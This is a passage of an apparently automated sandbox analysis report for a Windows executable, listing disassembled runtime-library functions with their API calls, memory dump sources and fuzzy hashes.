                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FlsGetValue.KERNEL32(?,?,?,00007FF72C9FC9D3,?,?,00000000,00007FF72C9FCC6E,?,?,?,?,?,00007FF72C9FCBFA), ref: 00007FF72CA071E3
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C9FC9D3,?,?,00000000,00007FF72C9FCC6E,?,?,?,?,?,00007FF72C9FCBFA), ref: 00007FF72CA07202
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C9FC9D3,?,?,00000000,00007FF72C9FCC6E,?,?,?,?,?,00007FF72C9FCBFA), ref: 00007FF72CA0722A
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C9FC9D3,?,?,00000000,00007FF72C9FCC6E,?,?,?,?,?,00007FF72C9FCBFA), ref: 00007FF72CA0723B
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C9FC9D3,?,?,00000000,00007FF72C9FCC6E,?,?,?,?,?,00007FF72C9FCBFA), ref: 00007FF72CA0724C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                  • Opcode ID: 1663a44eae8f82a26d11b9e12c7d48bc313854e6dd7bdf1d345b4e7f37362408
                                                                                                                                                                  • Instruction ID: 195a48cd1b6756ee939eb392e9e68681cfcd8980ee7896b025447a128bc3e7f4
                                                                                                                                                                  • Opcode Fuzzy Hash: 1663a44eae8f82a26d11b9e12c7d48bc313854e6dd7bdf1d345b4e7f37362408
                                                                                                                                                                  • Instruction Fuzzy Hash: 78115E20E0D64242FA98B331BD51B399162DF74BF0FC45334E83D4A7D6DE3CA4418A24
                                                                                                                                                                  Function 00007FF72CA07058 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                  • Opcode ID: dc8ea1d9519b54fa4a9724d128b0dab74a31c9f666ccf91e0b1130d4ce44c25a
                                                                                                                                                                  • Instruction ID: 81a348c7f1d7e9080dbfcb8478a78a833ac72e5bab10dfd4125968e94cac26d9
                                                                                                                                                                  • Opcode Fuzzy Hash: dc8ea1d9519b54fa4a9724d128b0dab74a31c9f666ccf91e0b1130d4ce44c25a
                                                                                                                                                                  • Instruction Fuzzy Hash: B611D610E0924342F998BB35BC61B799162CF74BB0F941734E93E4A6D6DE3DB8418A39
                                                                                                                                                                  Function 00007FF72C9EC1C0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 319COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3668304517-3916222277
                                                                                                                                                                  • Opcode ID: 5f376059e06d9fe9c7a00089e6956f19652ed4f00f2701aae3a7620824b6b20a
                                                                                                                                                                  • Instruction ID: 8b532fbd26df02e108c833b324d5787d77cc38634ebac13184c68eee71b64650
                                                                                                                                                                  • Opcode Fuzzy Hash: 5f376059e06d9fe9c7a00089e6956f19652ed4f00f2701aae3a7620824b6b20a
                                                                                                                                                                  • Instruction Fuzzy Hash: C4D1B462E08A8280EB10FB65DC442ADA361FB25BE8F945137DD9D1769ADF38D881C760
                                                                                                                                                                  Function 00007FF72C9E44C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 232COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF72C9E6B70: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF72C9E6B9B
                                                                                                                                                                    • Part of subcall function 00007FF72C9E6B70: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF72C9E6BC0
                                                                                                                                                                    • Part of subcall function 00007FF72C9E6B70: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF72C9E6BEA
                                                                                                                                                                    • Part of subcall function 00007FF72C9E6B70: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF72C9E6C7B
                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72C9E47B5
                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72C9E47BB
                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72C9E47C1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Lockitstd::_$_invalid_parameter_noinfo_noreturn$Lockit::_Lockit::~_
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 3916664010-578493202
                                                                                                                                                                  • Opcode ID: e54c4acb47f624ec6f434ed15ec4b09e4bc5bfdf26a20640a05fc2d9da5ddb96
                                                                                                                                                                  • Instruction ID: f43213f14f1744164ed7088f47f5eacb64b907a28026154932dfc77a3609c527
                                                                                                                                                                  • Opcode Fuzzy Hash: e54c4acb47f624ec6f434ed15ec4b09e4bc5bfdf26a20640a05fc2d9da5ddb96
                                                                                                                                                                  • Instruction Fuzzy Hash: 8291A662B0CB8189FB10EBA5C4543AC6371EB6ABA8F904132CE5D17BD9DF39E445CB50
                                                                                                                                                                  Function 00007FF72CA09D2C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 221COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                  • API String ID: 3215553584-1196891531
                                                                                                                                                                  • Opcode ID: 398b53326ae3c026d8ef7bcb4cf0aed91f06653734689e020cf0110d6b79d4c6
                                                                                                                                                                  • Instruction ID: e2092a120e91bc46a3440321ffee7204030ced3caada9be9bd68afd2759a3fce
                                                                                                                                                                  • Opcode Fuzzy Hash: 398b53326ae3c026d8ef7bcb4cf0aed91f06653734689e020cf0110d6b79d4c6
                                                                                                                                                                  • Instruction Fuzzy Hash: F581B472E0C30285F7647E39A960B78A6B0FB307E8FD58035DA0A57685CB2DEC41DB21
                                                                                                                                                                  Function 00007FF72CA09A68 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 212COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                  • API String ID: 3215553584-1196891531
                                                                                                                                                                  • Opcode ID: 70b1faf14e569e202865952ac99b21c55bfbcad33b38386691814d14d433bd96
                                                                                                                                                                  • Instruction ID: fb563f2d5b852296dba722815cf709223fe89271fa9258f1e4512527cc4d51a0
                                                                                                                                                                  • Opcode Fuzzy Hash: 70b1faf14e569e202865952ac99b21c55bfbcad33b38386691814d14d433bd96
                                                                                                                                                                  • Instruction Fuzzy Hash: 6A81DF31D0C2428AF7646A39AE54B79AAF0FF327F8FD45031CA0E465D5CA2DA841DF21
                                                                                                                                                                  Function 00007FF72C9CD670 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 169COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 3936042273-578493202
                                                                                                                                                                  • Opcode ID: 622e6de038eb722d352deb0426d3fdc7c67c301319c5decd8c9bbfab92094357
                                                                                                                                                                  • Instruction ID: c6fa0a8e67c16e5d8f4d7b0f431e4526d90f52e50ae6b5d214ceccd5f465f146
                                                                                                                                                                  • Opcode Fuzzy Hash: 622e6de038eb722d352deb0426d3fdc7c67c301319c5decd8c9bbfab92094357
                                                                                                                                                                  • Instruction Fuzzy Hash: 3D51E373A19B4185EA10AF15E94026DF3A4EB68BE0F948631DBDC07B95DF3CD9A1CB10
                                                                                                                                                                  Function 00007FF72C9F4A90 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                  • String ID: csm
                                                                                                                                                                  • API String ID: 2395640692-1018135373
                                                                                                                                                                  • Opcode ID: 755a5fe7f73a5d689be82d0671b68300f10bb52e7acddf2d664537cb0fed4d16
                                                                                                                                                                  • Instruction ID: 5c3ce8bee84975018929eadb63608fe60a9b0fb7d32bdfaec4bbc9f9c4f2c655
                                                                                                                                                                  • Opcode Fuzzy Hash: 755a5fe7f73a5d689be82d0671b68300f10bb52e7acddf2d664537cb0fed4d16
                                                                                                                                                                  • Instruction Fuzzy Hash: D951E632B096028ADB54EF15E854B7CB399FB65BA8F908130EA9D47745DF7CE841CB10
                                                                                                                                                                  Function 00007FF72C9F69C4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                                                  • Opcode ID: 6b8a965ca43953807a5e732a6252003fd0f606180e286370bd46e2709a45e06e
                                                                                                                                                                  • Instruction ID: 00d781b97dcdfb8db8156d66605b7b8d545c59a1b3072e15f35e2d2506fd1533
                                                                                                                                                                  • Opcode Fuzzy Hash: 6b8a965ca43953807a5e732a6252003fd0f606180e286370bd46e2709a45e06e
                                                                                                                                                                  • Instruction Fuzzy Hash: 7251AE3290C3828AEB64AF15994436CB7A8FB65BA5F948135DADC47B95CF3CE450CF10
                                                                                                                                                                  Function 00007FF72C9F61D4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                                                  • Opcode ID: 3a355bcac8b81883a2ccad545a664a2c8bdd8461706ace05c86d8c2225779f94
                                                                                                                                                                  • Instruction ID: 3957ee3d2f0b4915e3782296953c128cf2ec56a88c30b5e3ab6d6186f400d5af
                                                                                                                                                                  • Opcode Fuzzy Hash: 3a355bcac8b81883a2ccad545a664a2c8bdd8461706ace05c86d8c2225779f94
                                                                                                                                                                  • Instruction Fuzzy Hash: DD619032908BC581D760AF25E8403AAB7A4FB95BA4F444225EBDD43B55CF7CE094CF10
                                                                                                                                                                  Function 00007FF72C9E96C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: $*L\(&.$in Json::Value::getMemberNames(), value must be objectValue
                                                                                                                                                                  • API String ID: 3668304517-1700038481
                                                                                                                                                                  • Opcode ID: fcad06121cb427b66d7428271699ca92353f82652a11d40ff8b1f23b940c495e
                                                                                                                                                                  • Instruction ID: fba72473c4001d8062dc1b7a131c856a34b5d05ec756d028b92926add25ab8d1
                                                                                                                                                                  • Opcode Fuzzy Hash: fcad06121cb427b66d7428271699ca92353f82652a11d40ff8b1f23b940c495e
                                                                                                                                                                  • Instruction Fuzzy Hash: A051987291CBC581E610EB15E8401ADE365FBA5BE4F905232E6DC43AA9DF7CE490CB10
                                                                                                                                                                  Function 00007FF72C9E7260 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                  • API String ID: 2775327233-1405518554
                                                                                                                                                                  • Opcode ID: 040af10b6157e872dfc835baa0e15c3b9ec61df41762fbcce16fc13e722726e6
                                                                                                                                                                  • Instruction ID: f4e6fb761961f0bc7b0123ebbc6980a60d9d2c78708122a7e673b35116921f92
                                                                                                                                                                  • Opcode Fuzzy Hash: 040af10b6157e872dfc835baa0e15c3b9ec61df41762fbcce16fc13e722726e6
                                                                                                                                                                  • Instruction Fuzzy Hash: 6241BF22B0AA81C9FB20EF71E8912BC7364EF64718F884035DF8D26A55CE39D552D724
                                                                                                                                                                  Function 00007FF72C9D5330 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                  • API String ID: 2775327233-1405518554
                                                                                                                                                                  • Opcode ID: f491357505a8c0e4502c81c68992ba5428a7d1f52ffd2568fec13d9d83c12e45
                                                                                                                                                                  • Instruction ID: fbcf12c21bcef215dad660a9ddf083b2e3c420a45ab8048d59dead046ff30801
                                                                                                                                                                  • Opcode Fuzzy Hash: f491357505a8c0e4502c81c68992ba5428a7d1f52ffd2568fec13d9d83c12e45
                                                                                                                                                                  • Instruction Fuzzy Hash: F7418F22B0AA81C9EB20EF70D8503FC7364EF64718F884435DA8D26A59CE38D512D765
                                                                                                                                                                  Function 00007FF72CA07D10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                  • String ID: *L\(&.$U
                                                                                                                                                                  • API String ID: 442123175-138147472
                                                                                                                                                                  • Opcode ID: 26407c493de7ae598b61e49771dd347e6341eebb60b6796b06b6e28fe12133ed
                                                                                                                                                                  • Instruction ID: 43d410fa92b34522307b9ae6c3882180a73aca75f49f45ded1a25874a5e1d9a3
                                                                                                                                                                  • Opcode Fuzzy Hash: 26407c493de7ae598b61e49771dd347e6341eebb60b6796b06b6e28fe12133ed
                                                                                                                                                                  • Instruction Fuzzy Hash: FF41B422B19A4586EB609F25F8457BAA7B1FBA87E4F844031EE4D87748EF3CD441CB50
                                                                                                                                                                  Function 00007FF72C9F2770 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FeaturePresentProcessor__raise_securityfailurecapture_previous_context
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 838830666-578493202
                                                                                                                                                                  • Opcode ID: af2c920c0825cbac3652e5f06c2375fdb4ab17b5b129dbe79d7352efa525817f
                                                                                                                                                                  • Instruction ID: d4aa0b2457df463f583906bddb2392e18364a7e59a9b2bf8dec0bd7991af3ce2
                                                                                                                                                                  • Opcode Fuzzy Hash: af2c920c0825cbac3652e5f06c2375fdb4ab17b5b129dbe79d7352efa525817f
                                                                                                                                                                  • Instruction Fuzzy Hash: ED210334A29B0282EA40AB14FC65774B7B8FBA4724FD01176DA8D837A1DF3DE4148B60
                                                                                                                                                                  Function 00007FF72C9FE370 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
